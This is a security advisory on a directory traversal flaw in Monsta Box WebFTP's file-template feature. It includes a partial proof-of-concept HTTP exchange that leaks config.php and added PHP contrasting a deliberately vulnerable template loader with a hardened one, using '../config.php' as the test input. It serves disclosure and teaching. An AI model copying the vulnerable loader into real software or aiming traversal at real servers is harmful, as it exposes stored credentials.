Monsta Box WebFTP Arbitrary File Read

Type packetstorm
Reporter Imre Rad
Modified 2016-04-08T00:00:00


"MONSTA Box is a lightweight open-source file manager you can install on
your website or server * to easily manage your files through any browser."
(Description from the official website.)
The Monsta Box WebFTP application supports file templates when creating
new files. The template name is taken from a parameter of the HTTP request,
so it is user input, and it was not sanitized correctly: the value was used
to build a path under the template directory without rejecting directory
traversal sequences. By sending an HTTP request with a modified template
parameter it was possible to traverse out of the template directory and read
arbitrary files, with the file-system permissions of the Monsta Box WebFTP
application.
A proof-of-concept request/response reading the config.php file of the
Monsta Box installation. The modified template parameter is carried in the
POST body, which is not reproduced in this copy; the response returns the
contents of the requested file inside the editor textarea:
POST /? HTTP/1.1
Host: somehost
Referer: http://somereferer/
Content-Length: 352
Cookie: PHPSESSID=somecookie

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Mar 2016 19:34:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
Pragma: no-cache

<div id="blackOutDiv"><div id="popupFrame" style="left: 110px; top:
60px; width: 1030px;"><div id="popupHeaderAction">Editing:
/xxx</div><div id="popupBodyAction" style="height: 693px;"><input
type="hidden" name="file" value="~/xxx"><textarea name="editContent"
id="editContent" style="height: 608px;"><?php
# Open README file for descriptions and help.
$ftpHost = "somehost";
$ftpPort = "21";
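The PHP below is an added illustration and is not Monsta Box's own code (which this advisory does not reproduce). It reconstructs the vulnerable pattern described above, a template name taken from the request and joined onto the template directory, next to a hardened loader that allow-lists the name and checks the canonical path. The function names, the templates/ directory layout and the sample files are assumptions for the demo; they are created in a temporary directory so the script runs stand-alone and mirrors the PoC (a config.php one level above the template directory).

```php
<?php
// Added example, not Monsta Box's own code: a hypothetical template loader
// reconstructing the vulnerable pattern from the advisory, next to a hardened one.

/**
 * Vulnerable: the user-controlled template name is joined straight onto the
 * template directory, so a name such as "../config.php" escapes it.
 */
function loadTemplateVulnerable($templateDir, $name)
{
    return @file_get_contents($templateDir . '/' . $name);
}

/**
 * Hardened: accept only a bare file name, then canonicalise with realpath()
 * and confirm the result still lies under the template directory. Returns
 * false for anything rejected or unreadable.
 */
function loadTemplateHardened($templateDir, $name)
{
    // Allow-list: letters, digits, "_", "-" and "."; no separators, no NUL bytes.
    // ".." is excluded explicitly because "." is otherwise allowed.
    if (!preg_match('/\A[A-Za-z0-9_.-]{1,64}\z/', $name) || strpos($name, '..') !== false) {
        return false;
    }
    $base = realpath($templateDir);
    $path = realpath($templateDir . '/' . $name);
    if ($base === false || $path === false) {
        return false;
    }
    // realpath() resolves symlinks and "..", so a prefix check on the canonical
    // path is reliable. The trailing separator keeps "/templates_evil" from
    // matching "/templates" and keeps the directory itself out.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return file_get_contents($path);
}

// Constructed demo layout in a temp directory, mirroring the advisory's PoC:
// one template inside templates/ and a config.php one level above it.
$root = sys_get_temp_dir() . '/monsta_demo_' . getmypid();
mkdir($root . '/templates', 0700, true);
file_put_contents($root . '/templates/default.txt', "<?php\n// template body\n");
file_put_contents($root . '/config.php', "<?php\n\$ftpHost = \"somehost\";\n");
$dir = $root . '/templates';

// "sub/x.txt" does not exist, so both loaders deny it; the interesting case is
// "../config.php", which only the hardened loader refuses.
$cases = array('default.txt', '../config.php', 'sub/x.txt');
foreach ($cases as $name) {
    printf("%-16s vulnerable: %-7s hardened: %s\n",
        $name,
        loadTemplateVulnerable($dir, $name) === false ? 'denied' : 'read',
        loadTemplateHardened($dir, $name) === false ? 'denied' : 'read');
}

// Clean up the constructed files.
unlink($root . '/templates/default.txt');
unlink($root . '/config.php');
rmdir($root . '/templates');
rmdir($root);
```

Run it with `php demo.php`. The allow-list alone would already block the PoC; the realpath() prefix check is kept as a second layer so that a symlink dropped into the template directory, or a future change that loosens the allow-list, still cannot reach outside it.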
Affected versions  
The above vulnerability was fixed in version 1.8.3. Older versions of  
Monsta Box with template support are vulnerable.  
Timeline
2016-03-29: Vendor contacted to find the appropriate contact person for the report
2016-03-30: Vulnerability reported
2016-03-31: Fixed version published
2016-04-07: Public disclosure
Discovered by  
Imre RAD